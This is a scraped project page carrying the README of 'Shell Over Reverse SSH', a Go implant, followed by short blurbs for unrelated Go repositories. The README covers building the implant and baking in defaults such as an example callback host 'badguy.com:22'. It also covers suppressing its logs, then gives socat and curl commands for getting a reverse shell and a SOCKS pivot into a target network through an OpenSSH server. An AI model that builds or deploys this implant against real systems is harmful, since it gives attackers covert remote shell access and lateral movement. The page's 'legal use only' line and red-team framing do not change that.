A simple implant which connects back to an OpenSSH server

Overview

Shell Over Reverse SSH

A simple implant which connects back to an OpenSSH server, requests a port be forwarded to it from the server, and serves up SOCKS4a or a shell to forwarded connections.

For legal use only

Building

Compilation requires the Go compiler. A simple make will generate a key and build the implant with the key baked in. Running the resulting binary with -h will list commandline options:

$ make
go build -trimpath -o bin/genkey cmd/genkey/genkey.go
if ! [ -f cmd/shelloverreversessh/key ]; then  bin/genkey -out cmd/shelloverreversessh/key;  else  touch cmd/shelloverreversessh/key;  fi
if ! [ -h key.pub ]; then ln -s cmd/shelloverreversessh/key.pub; fi
go build -ldflags='' -trimpath -o bin/shelloverreversessh cmd/shelloverreversessh/shelloverreversessh.go

$ ./bin/shelloverreversessh -h
Usage: ./bin/shelloverreversessh [options]

Connects back to an OpenSSH server, requests a port be forwarded from the
server to the implant (i.e. -R), and accepts SOCKS4A requests.  If a forwarded
connection is to be made via the SOCKS listener to the special address
SHELL, instead of a TCP connection, a shell (sh/cmd) is hooked up.

Options:
  -addr address
    	Server address
  -fingerprint string
    	Server host fingerprint
  -key base64
    	SSH private key, base64-encoded (default "oCXpu1Uv0+RjG/ynqm5xU9qXrt5dR+VhIpVcg6dfyubdDw6VLXuSDW+Ppld40UBMCvPFXklvjLwi9rnlN49Bxg")
  -port port
    	SOCKS listen port
  -user username
    	SSH username (default "h4x")

Baked-in config

This should be sufficient for simple testing but at some point it'll probably be a better idea to set sensible defaults. The GOLDFLAGS environment variable can be used to bake-in default value, as would be passed to Go's -ldflags.

The available default values to set are:

Value Example Description
main.addr badguy.com:22 Server address or hostname
main.hostfp SHA256:pj9OCPiqVVLraIJjpmIdlwg6jOY/o4BQ5uwBx0GTB0g Host fingerprint, unset to not validate the host's fingerprint (bad idea); try make getlocalkey
main.user noth4x SSH username, default is h4x
main.port 12345 SOCKS listen port, unset for a default randomish port

In practice, building looks something like

make clean && make GOLDFLAGS="-X main.hostfp=SHA256:pj9OCPiqVVLraIJjpmIdlwg6jOY/o4BQ5uwBx0GTB0g -X main.addr=example.com:22 -X main.port=5555"
# Implant is ready in bin/

Disabling logging

At the moment, there's no good way to disable the implant's logging to stderr. Either redirect stderr somewhere else (i.e. 2>/dev/null) or edit the code to tell the logging library to not log to stderr (i.e. log.SetOutput(io.Discard)).

Make targets

There are a few other make targets:

Target Description
clean Removes the compiled implant. Handy when changing baked-in defaults.
distclean Slightly easier than cd .. && rm -rf shelloverreversessh && git clone ...
getlocalkey Grabs SSH hostkey fingerprints from localhost. Also an easy way to lookup the syntax for it.

Actually using this thing

First thing to do is get the implant connected back to the server.

  1. Build it. make plus GOLDFLAGS is the easiest way.
  2. Make sure the right user is on the SSH server and the key from key.pub is in the user's authorized_keys.
  3. Run the implant (bin/shelloverreversessh) on target. OpenSSH on the server should start listening on a port for forwarding connection to the implant.

SOCKS4a

The listening port is functionally a SOCKS4a proxy, much like the OpenSSH client's -R $PORT.

curl --proxy socks4a://127.0.0.1:$PORT https://insidetarget

Shell

Asking the implant to proxy to the special address SHELL causes the implant to spawn a shell (/bin/sh or cmd.exe) and hook up the forwarded connection to it.

socat socks4a:127.0.0.1:SHELL:1,socksport=$PORT -

Keys

An ed25519 private key will be baked in at compile-time and can be generated with the included genkey program. This is all taken care of by the makefile. The public side of the key in OpenSSH authorized_keys format will be symlinked to key.pub.

If compiling by hand, it'll be necessary to make a key before building the implant.

$ cd cmd/shelloverreversessh/
$ ls
shelloverreversessh.go
$ go build
shelloverreversessh.go:37:13: pattern key: no matching files found
$ go run ../genkey
$ go build
$ ls
key
key.pub
shelloverreversessh
shelloverreversessh.go
Owner
Stuart
Recreational codemonkey. Usually on libera as stuart. Red teamer.
Stuart
This is a golang C2 + Implant that communicates via Protocol Buffers (aka. protobufs).

Br4vo6ix DISCLAIMER: This tool is for educational, competition, and training purposes only. I am in no way responsible for any abuse of this tool This

RITSEC Redteam 5 May 15, 2022
Proxy that keeps clients active until the backend server is back online

HoneySmoke HoneySmoke is a prototype proxy for testing until it eventually becomes HoneyHive. HoneySmoke will eventually implement a limbo mode that k

Ethan 4 Nov 20, 2021
A C/S Tool to Download Torrent Remotely and Retrieve Files Back Over HTTP at Full Speed without ISP Torrent Limitation.

remote-torrent Download Torrent Remotely and Retrieve Files Over HTTP at Full Speed without ISP Torrent Limitation. This repository is an extension to

Bruce Wang 57 Oct 7, 2021
Helping Indiranagar ka Gunda get back home at the earliest

Indiranagar ka Gunda This is the solution to a problem given to me by @exagil. The problem is as follows: Chirag is Indiranagar ka Gunda, but somehow,

Kaustubh Maske Patil 0 Nov 27, 2021
Automatically exposes the remote container's listening ports back to the local machine

Auto-portforward (apf) A handy tool to automatically set up proxies that expose the remote container's listening ports back to the local machine. Just

Ruoshan Huang 277 Jun 14, 2022
Back end of e-books and papers collection website. Only for internal use.

Back end of e-books and papers collection website. Only for internal use.

null 1 Feb 6, 2022
A simple server which can be used as an RPC endpoint in popular Ethereum wallets.

RPC Endpoint This repository contains code for a simple server which can be used as an RPC endpoint in popular Ethereum wallets. The endpoint is https

Flashbots 85 Jul 30, 2022
A discord server guard which uses emojis and bot detection (WIP)

server-guard A discord server guard which uses emojis and bot detection (WIP) Config options SusLevel: how many checks the account has to fail before

post 10 Dec 6, 2021
A http proxy server chaining a upstream which needs authentication headers.

Normalize HTTP Proxy A http proxy server chaining a upstream which needs authentication headers. local -> [np] -> upstream -> destination Usage Norma

LOGI 14 May 23, 2022
A small tool used to correspond to the IP address according to the name, id, and network alias of the docker container, which can be run as a DNS server

A small tool used to correspond to the IP address according to the name, id, and network alias of the docker container, which can be run as a DNS server

Swift 5 Apr 4, 2022
Broadcast-server - A simple Go server that broadcasts any data/stream

broadcast A simple Go server that broadcasts any data/stream usage data You can

Zack 53 Jul 29, 2022
A simple project which enables you to check wheather the website is up

Website Status Checker A simple project which enables you to check wheather the website is up and working fine or is the website has been crashed. Abo

Sujay 2 Nov 8, 2021
Lobby - A Nox game lobby which exposes a simple HTTP API for both listing and registering Nox game servers

Nox lobby server This project provides a Nox game lobby which exposes a simple H

NoX World 3 Mar 6, 2022
A Language Server Protocol (LSP) server for Jsonnet

Jsonnet Language Server Warning: This project is in active development and is likely very buggy. A Language Server Protocol (LSP) server for Jsonnet.

Jack Baldry 17 Apr 29, 2022
The server-pubsub is the main backend of DATAVOC project that manages all the other web-server modules of the same project such as the processor

server-pubsub The server-pubsub is the main backend of DATAVOC project that manages all the other web-server modules of the same project such as the p

null 0 Dec 3, 2021
server-to-server sync application, written in go/golang.

svcpy: server to server copy a basic server-to-server copy application. on a single binary, it can be a server or a client. example usage: on the serv

Mert Akengin 0 Nov 4, 2021
Server and client implementation of the grpc go libraries to perform unary, client streaming, server streaming and full duplex RPCs from gRPC go introduction

Description This is an implementation of a gRPC client and server that provides route guidance from gRPC Basics: Go tutorial. It demonstrates how to u

Joram Wambugu 0 Nov 24, 2021
Pape-server - A small server written in golang to serve a random wallpaper.

pape-server I like to inject custom CSS themes into a lot of websites and electron apps, however browsers don't let websites access local disk through

null 0 Dec 31, 2021
Cert bound sts server - Certificate Bound Tokens using Security Token Exchange Server (STS)

Certificate Bound Tokens using Security Token Exchange Server (STS) Sample demonstration of Certificate Bound Tokens acquired from a Security Token Ex

null 0 Jan 2, 2022